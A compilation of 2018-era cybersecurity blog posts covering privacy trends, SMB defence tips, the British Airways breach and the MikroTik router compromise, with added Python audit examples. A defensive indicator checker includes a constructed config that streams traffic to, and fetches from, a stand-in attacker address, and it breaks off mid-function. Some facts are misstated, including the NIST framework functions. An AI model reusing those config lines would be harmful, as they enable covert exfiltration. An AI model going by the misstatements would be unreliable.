This type of data exploitation, even with the user’s consent, adds complexity and thus raises malware and SPAM/advertising risk, and antivirus makers are challenged to stay ahead of these exploits. The GDPR (General Data Protection Regulation) states that this kind of personal data collection and user tracking is not permitted to override the “fundamental rights and freedoms of the data subject, including privacy” and is, in the EFF authors’ view, not permitted by the new European regulation (Bill Budington, Bennett Cyphers, Alan Toner, and Jeremy Gillula, Electronic Frontier Foundation, 12/22/18). The courts will test this over time.

Further complicating the matter are the terms of service on data-centric technology platforms such as Facebook, Twitter, LinkedIn, WordPress, Instagram, Amazon, etc. Their business models require considerable data sharing with third- and fourth-party business entities, who gather elements of specific user data and then combine them with other browser and device fingerprinting data elements, thus completing the dataset. All the while the data subject and the interconnected entities are mostly clueless. This further complicates compliance and erodes privacy, but it is great for marketers; many people appreciate that Amazon correctly suggests what they often desire. Yet that is not always a good thing, because it starts to precondition a person or a culture to norms at the expense of originality. In the past we saw tobacco companies do this unethically, targeting young people, and there are more examples. Think for yourself.

This begs the question of who owns these datasets and at what point in their assembly, where they are stored, how they are protected, and to what extent informed consumers can opt out where practicable, observing that there will be some incidental data collection that has business protection. This paradox spurs competition and the growth of privacy enhancing technologies (PETs). Existing PETs include communication anonymizers, shared bogus online accounts, obfuscation tools, two- or three-factor authentication, VPNs (virtual private networks), I.P. address rotation, enhanced privacy ID (EPID), and digital signature algorithms (encryption) which support anonymity in that each user has a unique public verification key and a unique private signature key. Often these PETs are more useful when used with a fake account or server (honeynet). This attempts to divert and frustrate a potential intruder while giving the defender valuable intelligence.

Fig. 4. VPN Data Flow Diagram, Stock, 2018.

Opera, Tor and Firefox are leading secure browsers, but there is an opportunity for better security and privacy plugins for the Chrome (Google) browser, while VPN (Virtual Private Network) technologies should be used at the same time for added privacy. These technologies are designed to limit tracking and correlation of users' interactions with third-party entities. Limited disclosure (LD) often uses cryptographic techniques (CT) which allow users to retrieve only data that is vetted by providers, so that the data transmitted to the third party is trusted and verified.

3. Artificial Intelligence Will Grow on The SMB (Small and Medium Business) and Individual Market

In the past, artificial intelligence (AI) has been primarily the plaything of big tech companies like Amazon, Baidu, Microsoft, Oracle, Google, and some well-funded cybersecurity startups like Cylance. Yet for many other companies and sectors of the economy, these AI systems have been too expensive and too difficult to roll out effectively. Heck, even machine learning and big data analytics systems can be cost and time prohibitive for some sectors of the economy, and for sure the individual market in prior years. However, we feel the democratizing of cloud-based AI and machine learning tools will make AI tools more accessible to the SMB and individual market.

Fig. 5. Open Source TensorFlow Math AI, Google, 2018.

At present, Amazon dominates cloud AI with its AWS (Amazon Web Services) subsidiary. Google is challenging that with TensorFlow, an open-source AI library that can be used to build other machine-learning software. TensorFlow was the Machine Learning behind suggested Gmail smart replies. Recently Google announced their Cloud AutoML, a suite of pre-trained systems that could make AI easier to use (Kyle Wiggers, Venture Beat, 07/28/18). Additionally, “Google announced Contact Center AI, a machine learning-powered customer representative built with Google’s Dialogflow package that interacts with callers over the phone. Contact Center AI, when deployed, fields incoming calls and uses sophisticated natural language processing to suggest solutions to common problems. If the virtual agent can’t solve the caller’s issue, it hands him or her off to a human agent — a feature Google labels “agent assist” — and presents the agent with information relevant to the call at hand” (Kyle Wiggers, Venture Beat, 07/28/18). 

The above contact center AI and chatbots can both be applied successfully to personal use cases such as medical triaging, travel assistance, self-harm prevention, translation, training, and improved personal service. Cloud platforms and AI construction tools like the open source TensorFlow will enable SMBs to optimize insurance prices, model designs, diagnose and treat eye conditions, build intelligent contact center personas and chatbots, and much more as technology evolves in 2019.

2. Useful Big Data Will Make or Break Organizational Competitiveness

Developed economies increasingly use big data-intensive technologies for everything from healthcare decisioning to geolocation to power consumption, and soon the world will too. From traffic patterns to music downloads to web service application histories and medical data, it is all stored and analyzed to enable technology and services. Big data use has increased the demand for information management companies such as Oracle, Software AG, IBM, Microsoft, Salesforce, SAP, HP, and Dell-EMC, who themselves have spent billions on software tools and buying startups to fill their own considerable big data analytics gaps.

Fig. 6. Big Data Venn Diagram, Stock, 2018.

For an organization to be competitive and to ensure its future survival, a "must have big data goal" should be established to handle the complexity of the ever-increasing massive volume of both structured (rows and tables) and unstructured (images and blobs) data. In most enterprise organizations, the volume of data is too big, or it moves too fast, or it exceeds current processing capacity. Moreover, the explosive growth of Internet of Things (IoT) devices provides new data, APIs, plugins/tools, and thus complexity and ambiguity.

We know there are open source tools that will likely improve reliability in big data, AI, service, and security contexts in 2019. For example, Apache Hadoop is well-known for its huge-scale data processing capabilities. Its open source big data framework can run on-prem or in the cloud and has very low hardware requirements (Vladimir Fedak, Towards Data Science, 08/29/18). Apache Cassandra is another big data tool, born out of Facebook around 2010. It can process structured data sets distributed across a huge number of nodes around the world. It works well under heavy workloads due to its architecture without single points of failure and boasts unique capabilities no other NoSQL or relational database has. Additionally, it features great linear scalability, simplicity of operations due to the simple query language used, constant replication across nodes, and more (Vladimir Fedak, Towards Data Science, 08/29/18).

For 2019, organizations should consider big data a mainstream quality business practice. They should utilize and research new tools and models to improve their big data use and applications, creating a center of excellence without being married to buzzwords or overly weak certifications that all too often squash disruptive solutioning. Lastly, these centers of excellence need to be dominated not by the traditional IT director overlords, but rather by the real people between the cracks who know more and have more creative ideas than these directors, who often build yes-man cliques around themselves and who are often not the most qualified. Great ideas and real leaders defy title.

1. Election Disinformation and Weak U.S. Polling Systems Harm Business and Must Be Fixed

The intersection of U.S. politics and media can at times be nasty, petty, selfish, or worse: outright lies and dirty smear campaigns run by shadow proxies who skirt campaign finance laws by posing as a non-political policy advocacy group, or, worse yet, by a foreign-sponsored clandestine intelligence agency of an enemy of the nation whose only rule is to disrupt U.S. elections. Perhaps Russia-, North Korea-, or even China-affiliated groups.

Innovations in big data and social media, browser proxies and fiber optic cable, and 5G, in conjunction with the antiquated and insecure U.S. polling system, make election news and security complicated, fragile and highly important. At present, there are few people and technology companies that can help resolve this dilemma. For a state-sponsored hacker group, altering a U.S. election is the ultimate power play.

Respect for all parties is a must and disinformation of any type should not be tolerated. Universities, think tanks, startups, government, and large companies need to put time and money into experimenting as to how we can reduce disinformation and better secure the polling systems. The first step is public awareness and education on checking purported news sources, especially those from digital media. The second step is more frequent enforcement of slander laws and policies. Lastly, we should hold technology companies to high media ethics standards and should write to their leaders when they violate them. 

As for securing the polling systems, multi-factor authentication should be used, and voting should be done digitally via secure encrypted keys. If Amazon can securely track the world's purchases of millions of products with way more data and complexity, and with service a moon shot better than your local state DMV (driver and motor vehicle) office, then the paper ballot and OCR (Optical Character Recognition) scanners need to go. There are many Android and iOS applications that are more secure, faster, and easier to use than the current U.S. polling system, and they are doing more complex things with more data that is changing at an exponentially faster rate. They were also made for less money. Shame on the U.S. OCR election system.

Business should not be afraid to talk about this, because, like malware, it will spread and be used to easily run businesses out of business, often due to greed and/or petty personal differences. Examples of this include hundreds or thousands of fraudulent negative Yelp reviews, driving a competitor's search rankings down or to a malicious site, redirecting their 1-800 number to a travel scam hotline, spreading false rumors, cyber-squatting, and more. Let 2019 be the year we stand to innovate via disruptive technologies for a more ethical economy.

About the Authors:

Fig. 7. Swenson and Mebratu.

Jeremy Swenson, MBA, MSST & Angish Mebratu, MBA met in graduate business school, where they collaborated on global business projects concerning leadership, team dynamics, and strategic innovation. They also worked together at Optum / UHG. Mr. Swenson is a seasoned (14 years) IT consultant, writer, and speaker in business analysis, project management, cyber-security, process improvement, leadership, music, and abstract thinking. Over 15 years Mr. Mebratu has worked with various Fortune 500 companies including Accenture and Thomson Reuters, and he is currently principal quality engineer/manager at UnitedHealthcare. He is also an expert in software quality assurance, cybersecurity technologies, and design and architecture of technology frameworks.

Top 12 Ways Small To Med Businesses Can Reduce Cyber Risk

1) Use the Free DHS Developed CSET (Cybersecurity Evaluation Tool) To Assess Your Security Posture: High, Med, or Low.

Figure 1. CSET Process (DHS, 2018).

2) Educate Employees About Cyber Threats and Hold Them Accountable. 

Educate your employees about online threats and how to protect your business’s data, including safe use of social networking sites. Depending on the nature of your business, employees might be introducing competitors to sensitive details about your firm’s internal business. Employees should be informed about how to post online in a way that does not reveal any trade secrets to the public or competing businesses. Use games with training and hold everyone accountable to security policies and procedures.

3) Protect Against Viruses, Spyware, and Other Malicious Code.

Make sure each of your business’s computers are equipped with antivirus software and anti-spyware and updated regularly. Such software is readily available online from a variety of vendors. All software vendors regularly provide patches and updates to their products to correct security problems and improve functionality. Configure all software to install updates automatically. Especially watch freeware which contains malvertising.

4) Secure Your Networks.

Safeguard your Internet connection by using a firewall and encrypting information. If you have a Wi-Fi network, make sure it is secure and hidden. To hide your Wi-Fi network, set up your wireless access point or router so it does not broadcast the network name, known as the Service Set Identifier (SSID). Have a secure strong password such as (xeyg1845%RELIGO) to protect access to the router.

5) Base Your Security Strategy Significantly on the NIST Cybersecurity Framework 1.1: Identify, Detect, Defend, Respond, and Recover.

Fig. 2. (NIST, 2018).

6) Establish Security Practices and Policies to Protect Sensitive Information.

Establish policies on how employees should handle and protect personally identifiable information and other sensitive data. Clearly outline the consequences of violating your business’s cybersecurity policies and who is accountable.

7) Require Employees to Use Strong Passwords and to Change Them Often.

Consider implementing multi-factor authentication that requires additional information beyond a password to gain entry. Check with your vendors that handle sensitive data, especially financial institutions, to see if they offer multi-factor authentication for your account. Smart card plus pass-code for example.

8) Employ Best Practices on Payment Cards. 

Work with your banks or card processors to ensure the most trusted and validated tools and anti-fraud services are being used. You may also have additional security obligations related to agreements with your bank or processor. Isolate payment systems from other, less secure programs and do not use the same computer to process payments and surf the Internet.

9) Make Backup Copies of Important Business Data and Use Encryption When Possible.

Regularly backup the data on all computers. Critical data includes word processing documents, electronic spreadsheets, databases, financial files, human resources files, and accounts receivable/payable files. Backup data automatically if possible, or at least weekly, and store the copies either offsite or on the cloud.

10) Control Physical Access to Computers and Network Components.

Prevent access or use of business computers by unauthorized individuals. Laptops can be particularly easy targets for theft or can be lost, so lock them up when unattended. Make sure a separate user account is created for each employee and require strong passwords. Administrative privileges should only be given to trusted IT staff and key personnel.

11) Create A Mobile Device Protection Plan.

Require users to password protect their devices, encrypt their data, and install security apps to prevent criminals from stealing information while the phone is on public networks. Use a containerization application to separate personal data from company data. Be sure to set reporting procedures for lost or stolen equipment.

12) Protect All Pages on Your Public-Facing Website, Not Just the Checkout and Sign-Up Pages.

Make sure submission forms can block spam and reject injected script (cross-site scripting attacks).

Contact Abstract Forward here for more info.

Abstract Forward Podcast #4: Network Scanning Tips With Chip Harris.

In this episode, we have a deep conversation with CISO Consultant Chip Harris. We start with an overview of network scanning, both free open source tools like OpenVAS and other more costly options like Tenable. We then talk about red teaming, issues with data security lakes, the Equifax data breach, how leadership impacts security, and how threat actors are typically better at innovating than defenders. We also cover the evolution of messaging, mobile device application hype and exploits, mobile application containerization, how the cyber kill chain came about, and a few things about the future of incident response.

Harris has an extensive background in government and business InfoSec engineering and red team planning and operations, with over 25 years of experience designing and managing IT systems. His expertise is in identifying and solving problems by delivering projects and solutions. His experience includes serving as the IT lead and project manager within the business unit, evaluating system performance, helping business leaders and non-technical clients understand how technology can improve workflow, developing and enforcing standard IT practices, and ensuring IT compliance with regulations such as NERC CIP, PCI, GDPR, HIPAA, and SOX.

He has a Ph.D. in Cyber Security and Cyber Operations from the United States War College, a Masters in Cyber Security and Cyber Crime from the United States War College, and a Bachelors in Computer Science and Animation from Memphis College of Art. He has the following certifications: MCE, MCSE, NCE, MCSA, MCM, MCT, Security +, SUSE Novell Linux, Open SUSE Enterprise, Ubuntu Server Admin, PICK WMS, Backtrack 5, Netools 5, Dell Kace 3000 and 1000, IBM Q-Radar, Carbon Black, Tenable Security Suite, Dark Trace, Q-Radar, IBM Guardium, OWASP, Check Point, RHL, Kali Linux Certified, C|EH, C|PT, C|HFI, CCE, GIAC Rated, Barracuda, and he is even Tripwire Certified.

Fig 1. (OpenVAS Greenbone Scan Demo, 2018).

Listen to the podcast here.


Learn more about Abstract Forward Consulting here.

Disclaimer:  This podcast does not represent the views of former or current employers and / or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

Top Ten Ways Companies Can Reduce Cyber Risk

Mid-sized businesses are defined as having from about $50 million to $800 million in revenue. A 2017 report published by Keeper Security and the Ponemon Institute found more than 50% of small and medium businesses had been breached in the past 12 months, but only 14% of them rated their ability to defend against cyber-threats as "highly effective" (Keeper / Ponemon, 2017). According to the 2017 Verizon Data Breach Investigations Report, 75% of the breaches were caused by outsiders, with 51% involving organized criminal groups, and the remainder involved internal actors. Not surprisingly, malware installed via malicious email attachments was present in 50% of the breaches involving hacking (Verizon, 2017). Here are ten steps (applicable to any size business) you can take to shield your mid-sized business from cyber-attacks:

10) Train Staff Often:

Most cyber-attacks take the form of phishing and spear phishing, in which hackers target individuals rather than computer systems, typically with the help of good social engineering (IT Governance Blog, 2017). Therefore, employees need to be educated to roll back what they share on social media and to opt out of data harvesting when they can. Training needs to be ongoing because the threat landscape and technology change so fast. For example, ransomware was not a serious attack vector 6 years ago, but it is front and center today. Additionally, crypto-currency mining networks are an exploit vector that is arguably less than 2 years old and growing rapidly. Lastly, training more often improves the company security culture, and that is directly related to keeping a good business reputation and core customer base. Here are a few more training necessities:

1. Follow cyber security best practices and conduct audits on a regular basis – based on your selected one or two frameworks (Cobit 5, ISO 2700, etc)

2. Use games, contests and prizes to teach cyber safety – leadership must do this as well.

3. Notify and educate staff of any current cyber-attacks – have a newsletter.

4. Teach them how to handle and protect sensitive data – do lunch and learns.

9) Secure Wireless Networks:

Wireless networks can be easily exploited by cyber attackers, unknowing guests, and even angry customers. Your network is not like a coffee shop community room but rather it’s like a bank vault with many segmented areas – map the segments and know their rank order value. To harden your wireless network, avoid WEP (Wired Equivalent Privacy) encryption (which can be cracked in minutes) and use only WPA2, which uses AES-based encryption and provides better security than WPA.

Fig 1. (WPA2 Selection Screen Clip).


If you have a Wi-Fi network, be sure access to the router is secured by a password and that the network is hidden so it does not broadcast its name. To hide your Wi-Fi network, set up your wireless access point or router so it does not broadcast the network name, known as the Service Set Identifier (SSID). Additionally, for protection against brute-force attacks, protect your network with a complex passphrase of at least 25 characters including a mix of upper- and lower-case letters, numerals and symbols. Use a firewall and encryption to safeguard your internet connection.

8) Physically Secure Your Environment:

Focusing on web tools and monitoring is needed, but it's also important to remember there are physical concerns about securing your network as well. To a threat actor, overcoming all of your security measures may be as easy as walking up to your router and pressing the reset button. Make sure that your key pieces of in-office infrastructure are secure, and that you're monitoring them with video, sensors or other physical security controls. Be creative and thorough about how you define a physical security connection point, including doors, public lobbies, windows, air vents, turnstiles, roofs, the printer room, the network closet, USB ports on machines, etc. Lastly, employees should keep their devices near them at all times.

7) Double Down on Firewalls:

While most routers have a firewall built in that can protect your internal network against outside attacks, you should know that it may not be automatically activated. It’s generally called something like SPI (stateful packet inspection) or NAT (network address translation). Either way, turn it on (Chelsea Segal, Cox Blue, 09/16/18).

It’s also important to ensure that your own software isn’t sending information out over the network or the internet without your permission. For that, you’ll want to install firewall software on your PC as well. PC Magazine’s top pick is Check Point ZoneAlarm Pro, but the default firewall that comes with Windows 8 and 10 is also a good start.

6) Evaluate Your Operational Resilience and Cyber-Security Practices Quarterly: 

A good start is the US-CERT's Cyber Resilience Review (CRR), which helps organizations assess enterprise programs and practices across 10 domains including risk management, incident management, service continuity, and more (SBA, 2018). They can also use the CSET (Cyber Security Evaluation Tool), a free, customizable, multi-framework general cyber security assessment created by DHS.

5) Review Control Access / IAM and Audit Access Regularly:

Administrative access to your systems should only be granted on a need-to-know basis (the least privilege principle). The correct job roles should be in the correct Windows access groups. Keep sensitive data, such as payroll, out of the hands of anyone who doesn't need it to do their job, marketing for example. Remove unused, stale, or unnecessary IAM users and credentials. Also, consider decommissioning old systems for risk reduction and cost savings, with the appropriate project analysis done. Use a strong password, especially for single sign-on interfaces, and add two-factor authentication. Organizations should audit their IAM user activity to see which users haven't logged into AWS for at least 90 days and revoke their permissions. Monitor user activity in all cloud services (including IAM user activity) to identify abnormal activity indicative of threats arising from a compromised account or a malicious or negligent internal employee, corroborated with event logs and related intelligence.
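The 90-day IAM review above, as an added example (not code from the original post): it reads the CSV layout of the AWS IAM credential report (`aws iam get-credential-report`) and returns the users to revoke plus console users with no MFA. The report contents, the audit date and the `SAMPLE_*` names are constructed for the example.

```python
"""Flag stale and MFA-less IAM users from an IAM credential report.

Added example (not from the original post). It reads the CSV layout of
the AWS IAM credential report; the report below is constructed sample
data that keeps only the columns this check uses (real reports carry
more columns, which csv.DictReader simply ignores).
"""
import csv
import io
from datetime import datetime, timedelta, timezone

# Constructed sample report. Timestamps are ISO 8601 as AWS emits them;
# "N/A", "no_information" and "not_supported" are the real sentinel values.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,mfa_active,access_key_1_active,access_key_1_last_used_date,access_key_2_active,access_key_2_last_used_date
<root_account>,arn:aws:iam::123456789012:root,2017-01-10T08:00:00+00:00,not_supported,2018-11-02T10:15:00+00:00,true,false,N/A,false,N/A
alice,arn:aws:iam::123456789012:user/alice,2017-03-01T09:00:00+00:00,true,2018-11-20T14:02:00+00:00,true,true,2018-11-21T07:30:00+00:00,false,N/A
bob,arn:aws:iam::123456789012:user/bob,2017-03-01T09:00:00+00:00,true,2018-06-01T11:00:00+00:00,false,true,2018-05-15T16:45:00+00:00,false,N/A
carol,arn:aws:iam::123456789012:user/carol,2018-11-25T09:00:00+00:00,true,no_information,false,false,N/A,false,N/A
"""

# The audit date is fixed so the sample is reproducible (constructed).
SAMPLE_NOW = datetime(2018, 12, 1, tzinfo=timezone.utc)
STALE_AFTER = timedelta(days=90)   # the 90-day threshold from the post

SENTINELS = {"N/A", "no_information", "not_supported", ""}


def parse_ts(value):
    """Return an aware datetime, or None for the AWS 'no value' sentinels."""
    if value in SENTINELS:
        return None
    return datetime.fromisoformat(value)


def last_activity(row):
    """Most recent console sign-in or access-key use recorded for a row."""
    stamps = [parse_ts(row.get(col, "")) for col in (
        "password_last_used",
        "access_key_1_last_used_date",
        "access_key_2_last_used_date")]
    stamps = [s for s in stamps if s is not None]
    return max(stamps) if stamps else None


def audit_credential_report(report_csv, now=SAMPLE_NOW):
    """Return (stale, no_mfa).

    stale: users with no sign-in or key use for >= 90 days. A user that has
    never been used ages from its creation time, so a brand-new account is
    not flagged. no_mfa: users with a console password but no MFA device;
    the root account reports password_enabled as not_supported and is
    treated as a console login.
    """
    stale, no_mfa = [], []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]
        seen = last_activity(row) or parse_ts(row["user_creation_time"])
        if seen is not None and now - seen >= STALE_AFTER:
            stale.append(user)
        console = row["password_enabled"] in ("true", "not_supported")
        if console and row["mfa_active"] != "true":
            no_mfa.append(user)
    return stale, no_mfa


if __name__ == "__main__":
    stale_users, users_without_mfa = audit_credential_report(SAMPLE_REPORT)
    print("revoke (idle >= 90 days):", stale_users)        # ['bob']
    print("console users without MFA:", users_without_mfa)  # ['bob', 'carol']
```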

4) Back up and Secure Your Systems and Data but Don’t Over Retain:

Ransomware, or viruses used by hackers to encrypt an organization's computer files and hold them hostage until a ransom is paid, has emerged as a serious and growing threat to businesses worldwide, according to the FBI (FBI CISO Report 2018). Whether data is stored in the cloud, on-premises, or in a hybrid data center, businesses should back up all files to hard drives stored in a safe place outside the reach of cyberthieves. These are some key data backup subpoints.

1. Limit access to sensitive data to only a few authorized employees.

2. Encrypt all your sensitive data – do not over-classify.

3. Backup your data periodically and store it in an offsite location.

4. Protect all devices with access to your data – third party vendor implications.

5. If you accept credit cards transactions, secure each point of sale.

3) Create a Guidebook for Mobile Security:

While mobile devices allow for work anywhere, anytime, they create significant security challenges. The FCC suggests requiring users to password-protect their devices, encrypt data, and install security apps to prevent criminals from stealing information while the phone is on public networks (FCC, Feb 2018). Plus, set reporting procedures for lost or stolen mobile devices. Draft a BYOD policy that separates personal vs. corporate data and covers the below points.

1. Ensure your equipment has the latest security software and run anti-virus/malware scans regularly. If you don’t have good anti-virus software installed, buy and install it.

2. Install all software updates as soon as they are available, including all web browsers.

3. Have the latest operating systems on your devices with access to regular updates.

4. Make sure your internet connection is protected with firewall security.

5. Make sure your Wi-Fi network is encrypted, hidden, and password protected.

2) Use Encrypted Websites for E-commerce Via Strong Third-Party Risk Management Policies:

Only buy from encrypted websites by looking for https on every page. Don't be lured in by super low prices or the like; it may be a drive-by download setup. Ensure that the owner of the website is reputable and is who they say they are. This gets at third party and supply chain risk management, which should be based on a security framework applicable to your industry.

1) Avoid When Possible and Rigorously Evaluate Freeware:

There are a lot of free options for software including anti-virus (AVG), graphic design (GIMP), and marketing and sales applications, some of which are quite reliable. However, many are not reliable and pose risk because they often come with malvertising, utility add-ons that slow things down, or direct malware. All of this complicates cyber risk and blurs sight lines into the infrastructure stack. Cyber security isn't a good place to cut costs, so pay for a good antivirus and firewall tool-set. If you are going to use a robust free graphic design tool like GIMP, make sure it is documented, always updated, and run in a restricted environment.

Bonus) Have a Sound Way To Prioritize Patching.

Establish a process to risk-rate vulnerabilities based on: the ease of exploit and potential impact of the vulnerability (reference the CVSS scores of the CVEs), whether other working defenses are in place, and lastly the grouping of the assets they may impact.
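The three criteria above carried through as a small prioritization routine; this is an added example, not the post's own process or any scanner's logic. The weights, patch windows, asset inventory and findings are constructed, and the CVE ids are placeholders.

```python
"""Risk-rate and group vulnerabilities by the three criteria in the post:
exploitability and impact (CVSS score), whether a working compensating
defense already covers the finding, and which assets are affected.

Added example, not from the original post. The scoring weights, asset
inventory and findings are constructed; CVE ids are placeholders.
"""
from collections import defaultdict

# Constructed inventory: business criticality 1 (low) .. 5 (high).
ASSETS = {
    "web-01":  {"criticality": 5, "internet_facing": True},
    "web-02":  {"criticality": 5, "internet_facing": True},
    "hr-db":   {"criticality": 4, "internet_facing": False},
    "kiosk-7": {"criticality": 1, "internet_facing": False},
}

# Constructed scanner findings. cvss is the CVSS base score (0-10),
# exploit_public means a working exploit is publicly known, and defended
# means a compensating control (WAF rule, filtered port, etc.) blocks the
# path today.
FINDINGS = [
    {"cve": "CVE-0000-0001", "asset": "web-01",  "cvss": 9.8, "exploit_public": True,  "defended": False},
    {"cve": "CVE-0000-0001", "asset": "web-02",  "cvss": 9.8, "exploit_public": True,  "defended": True},
    {"cve": "CVE-0000-0002", "asset": "hr-db",   "cvss": 7.5, "exploit_public": False, "defended": False},
    {"cve": "CVE-0000-0003", "asset": "kiosk-7", "cvss": 9.0, "exploit_public": True,  "defended": False},
]

# Patch windows by score, highest floor first (constructed policy).
WINDOWS = [(9.0, "emergency (72h)"), (6.0, "next patch cycle"), (0.0, "scheduled")]


def risk_score(finding, asset):
    """Score one finding on one asset.

    Start from CVSS, raise it when exploitation is easy (public exploit,
    internet exposure), halve it when a compensating defense is in place,
    then scale by how much the business cares about that asset.
    """
    score = finding["cvss"]
    if finding["exploit_public"]:
        score += 2.0
    if asset["internet_facing"]:
        score += 1.0
    if finding["defended"]:
        score *= 0.5
    score *= asset["criticality"] / 5.0
    return round(score, 2)


def patch_window(score):
    """Map a score to the patch window whose floor it reaches."""
    for floor, label in WINDOWS:
        if score >= floor:
            return label
    return WINDOWS[-1][1]


def prioritize(findings=FINDINGS, assets=ASSETS):
    """Group findings by CVE and order the groups by their worst score.

    Returns a list of dicts: cve, score (max across assets), window, and
    the affected assets with their individual scores, highest first.
    """
    by_cve = defaultdict(list)
    for f in findings:
        by_cve[f["cve"]].append((f["asset"], risk_score(f, assets[f["asset"]])))
    queue = []
    for cve, hits in by_cve.items():
        hits.sort(key=lambda h: h[1], reverse=True)
        top = hits[0][1]
        queue.append({"cve": cve, "score": top,
                      "window": patch_window(top), "assets": hits})
    queue.sort(key=lambda q: q["score"], reverse=True)
    return queue


if __name__ == "__main__":
    for item in prioritize():
        print(item["window"], item["cve"], item["score"], item["assets"])
```

Note that the same CVE lands in the emergency window because of web-01 even though the defended web-02 instance alone would only rate the next cycle; grouping by asset keeps both visible under one ticket.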

Reach out to me here for questions.

British Airways Data Breach Likely The First GDPR Rollback Test.

On 08/21/18 British Airways (BA) suffered the start of a data breach which ended on or about 09/05/18. A UPS (uninterruptible power supply) failure and subsequent power surge partly exacerbated the breach. It was also indicated that a third party (vendor) was involved in some way, which complicates liability and brings supply chain security more into scope.

The breach allowed cyber criminals to steal personal and financial information from about 380,000 customers who booked directly with the airline in the preceding two weeks (Ivana Kottasová, CNN, 09/07/18). When a passenger makes a booking through the BA website, they must submit their name, e-mail address, address, and credit or debit card details including the number, expiration date, and the security code or "Card Verification Value" (CVV). All of this was compromised.

Photo: Steve Parsons/PA.

Yet most interestingly, this is one of the first major data breaches since GDPR came into effect in May this year, Walters said (Samuel Gibbs, the Guardian, 09/07/18). “It appears that the company notified the Information Commissioner’s Office and customers within the GDPR’s mandatory 72 hours but the breach will now be investigated and the company could be penalized if it did not take all the necessary measures to protect customer data” (Samuel Gibbs, the Guardian, 09/07/18).

The GDPR rules now in force could see a great increase in the penalties slapped on firms for past data breaches, with fines levied at a maximum of 4% of global revenues. For British Airways this amounts to about $630 million based on last year's revenue (Gwyn Topham, the Guardian, 09/06/18).

Yet many observers see fines this hefty as counterproductive and the catalyst to push business outside of the EU. Moreover, many international law firms and economists have doubts about the applicability of the GDPR outside of the EU, citing state sovereignty, free enterprise protection in the United States, etc. The courts will likely further define the context of GDPR's applicability and may roll its reach back some. It is way too early to know what GDPR means in practice, but pushback is coming from well-funded, well-organized, well-researched and powerful law and business interest groups. GDPR is dangerously overbroad and ambiguous, as echoed in this law firm newsletter (Wendy Butler Curtis and Jeffrey McKenn, Orrick, Herrington & Sutcliffe LLP, 09/09/18). We welcome the debate for a better, more modern GDPR.

Thousands of MikroTik Routers Hacked to Spy On Network Traffic

At present more than 7,500 MikroTik routers have been compromised with malware, after attackers configured the devices to forward network traffic to a handful of IP addresses under their control (Shaun Nichols, The Register, 09/04/18). According to Chinese cyber research firm 360 Netlab, the attackers obtained access to the devices by exploiting CVE (Common Vulnerabilities and Exposures) 2018-14847. Ironically, this vulnerability has had a patch available since April 2018.

This vulnerability is associated with the Any Directory File Read flaw (CVE-2018-14847) in MikroTik routers, which was found to be exploitable by the CIA Vault 7 hacking tool identified as Chimay Red, along with another MikroTik Webfig remote code execution vulnerability.

Since 08/24/18 the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw (Tara Seals, Threatpost, 09/04/18).

The infection does not appear to be targeting any particular country, as the hacked devices reside across five different continents, with Russia, Iran, Brazil, and India being the most commonly impacted. The top 10 countries with compromised MikroTik routers are (Ms. Smith, CSO Online, 09/04/18):

  1. 1,628 in Russia
  2. 637 in Iran
  3. 615 in Brazil
  4. 594 in India
  5. 544 in Ukraine
  6. 375 in Bangladesh
  7. 364 in Indonesia
  8. 218 in Ecuador
  9. 191 in the US
  10. 189 in Argentina

The researchers noted that the malware is also resilient to reboots, leaving a firmware update as the only permanent solution to the problem (Shaun Nichols, The Register, 09/04/18). “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL,” Netlab writes.

Also, the attackers seek to infect victims with the browser-based Coinhive cryptomining script (Fig. 1). They achieve this by redirecting the HTTP proxy settings to an error page they created, where they placed the mining script. “By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users’ devices,” 360 Netlab researchers indicated.


However, the attackers made a mistake when they set up proxy access control lists that block all external web resources, including those required for the mining operation (Fig. 1).

360 Netlab says it does not know what the ultimate goal of the attacker will be. Their analysis shows that the attacker is particularly interested in ports 20, 21, 25, 110, and 144, which are for FTP-data, FTP, SMTP, POP3, and IMAP traffic. An unusual interest is in traffic from SNMP (Simple Network Management Protocol) ports 161 and 162, which researchers cannot explain at the moment (Shaun Nichols, The Register, 09/04/18).

“This deserves some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users’ network SNMP community strings?” 360 Netlab asks.

Bleeping Computer’s research recommends that MikroTik users install the latest firmware version on the device. Based on the information provided by 360 Netlab, users can check whether the HTTP proxy, Socks4 proxy, and network traffic capture features are active and being exploited by a malicious actor (Ionut Ilascu, Bleeping Computer, 09/04/18).
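One way to triage an exported RouterOS configuration for the features the articles say to check (HTTP proxy, Socks4 proxy, packet-sniffer streaming) plus the scheduled fetch task used for persistence after reboot, written here as an added example rather than anything published by 360 Netlab or MikroTik. The sample export, the 203.0.113.10 address and the task name are constructed placeholders; a hit is a reason to investigate and re-flash, not proof of compromise.

```python
import re
from collections import defaultdict

# Constructed sample of RouterOS `/export` output (not a real capture); the
# address and task name are placeholders, not indicators from the articles.
SAMPLE_EXPORT = """\
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny dst-host=* comment="blocks everything, including the mining script"
/ip socks
set enabled=yes port=4145
/tool sniffer
set streaming-enabled=yes streaming-server=203.0.113.10 filter-port=20,21,25,110,161,162
/system scheduler
add interval=1h name=u113 on-event="/tool fetch url=http://203.0.113.10/report.php mode=http"
"""

def parse_export(text):
    """Group each 'set'/'add' line under the '/section' header that precedes it."""
    sections = defaultdict(list)
    current = None
    for line in text.splitlines():
        if line.startswith("/"):
            current = line.strip()
        elif current and line.strip():
            sections[current].append(line.strip())
    return sections

def check_indicators(text):
    """Return the features the articles say to check, if they are switched on."""
    s = parse_export(text)
    findings = []
    def enabled(section):
        return any("enabled=yes" in ln for ln in s.get(section, []))
    if enabled("/ip proxy"):
        findings.append("http-proxy-enabled")
    # The attackers' own misstep: an ACL that denies every external host.
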